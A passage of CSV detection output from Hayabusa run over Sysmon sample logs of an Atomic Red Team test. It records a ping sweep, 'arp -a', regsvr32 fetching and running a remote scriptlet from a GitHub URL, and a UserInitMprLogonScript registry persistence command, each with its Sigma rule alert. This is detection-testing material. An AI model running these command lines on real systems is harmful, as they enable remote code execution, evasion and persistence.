747F3D96-D96B-5D31-0000-00107C693700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:32.058 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.235 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D96C-5D31-0000-00106A6C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:32.614 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.236 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-D96C-5D31-0000-0010BA763700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:33.018 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.237 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3228 | PGUID: 747F3D96-D96D-5D31-0000-0010A7793700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:33.548 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.238 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D96D-5D31-0000-0010937C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:34.005 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.239 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D96D-5D31-0000-0010827F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:34.556 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.240 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D96E-5D31-0000-00106E823700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:35.024 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.241 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D96F-5D31-0000-00105A853700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:35.559 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.242 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3556 | PGUID: 747F3D96-D96F-5D31-0000-0010C78F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:36.025 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.243 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3788 | PGUID: 747F3D96-D970-5D31-0000-0010B4923700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:36.536 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.244 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D970-5D31-0000-0010A0953700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:37.012 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.245 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2700 | PGUID: 747F3D96-D971-5D31-0000-00108C983700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:37.505 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.246 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 352 | PGUID: 747F3D96-D971-5D31-0000-0010789B3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:38.043 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.247 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3120 | PGUID: 747F3D96-D972-5D31-0000-00106BA43700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:38.588 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.248 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6976 | PGUID: 747F3D96-D972-5D31-0000-001057A73700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:39.024 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.249 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D973-5D31-0000-0010A3AA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:39.518 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.250 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5100 | PGUID: 747F3D96-D973-5D31-0000-00108FAD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:40.006 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.251 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D974-5D31-0000-00107BB03700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:40.535 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.252 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D974-5D31-0000-001068B33700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:40.982 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.253 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D974-5D31-0000-001006BD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:41.530 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.254 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1624 | PGUID: 747F3D96-D975-5D31-0000-001099C23700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.061 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6412 | PGUID: 747F3D96-D976-5D31-0000-00104AC63700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.276 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6292 | PGUID: 747F3D96-D976-5D31-0000-0010DBCC3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.276 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious Network Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.301 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: arp -a | Process: C:\Windows\System32\ARP.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D976-5D31-0000-001034CF3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.404 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D976-5D31-0000-0010D8D53700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.815 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4444 | PGUID: 747F3D96-D976-5D31-0000-001041E83700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.841 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2332 | PGUID: 747F3D96-D976-5D31-0000-001093EA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.841 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.841 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:43.445 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 3848 | PGUID: 747F3D96-D977-5D31-0000-00100A0E3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:43.574 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1476 | PGUID: 747F3D96-D977-5D31-0000-0010771B3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:44.026 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D978-5D31-0000-0010442F3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:44.054 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:44.054 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:44.054 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:45.157 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6152 | PGUID: 747F3D96-D978-5D31-0000-00101E7A3800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.204 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-D97A-5D31-0000-00105DA83800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.565 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7148 | PGUID: 747F3D96-D97A-5D31-0000-001089BD3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.589 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49728 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.589 +00:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/net_connection_win_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.848 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3564 | PGUID: 747F3D96-D97A-5D31-0000-00109DDC3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.848 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.893 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D97A-5D31-0000-001019DE3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.893 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.975 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4628 | PGUID: 747F3D96-D97A-5D31-0000-00102BE33800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:47.083 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | LID: 0x50951 | PID: 5788 | PGUID: 747F3D96-D97B-5D31-0000-00109DEB3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:47.239 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D97B-5D31-0000-0010F0F03800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:54.976 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4240 | PGUID: 747F3D96-D982-5D31-0000-0010DC633900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:54.976 +00:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation_sysmon/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:55.018 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D983-5D31-0000-00102E663900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:55.018 +00:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation_sysmon/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:01.925 +00:00,MSEDGEWIN10,13,medium,Persis,Common Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_common.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:01.955 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: 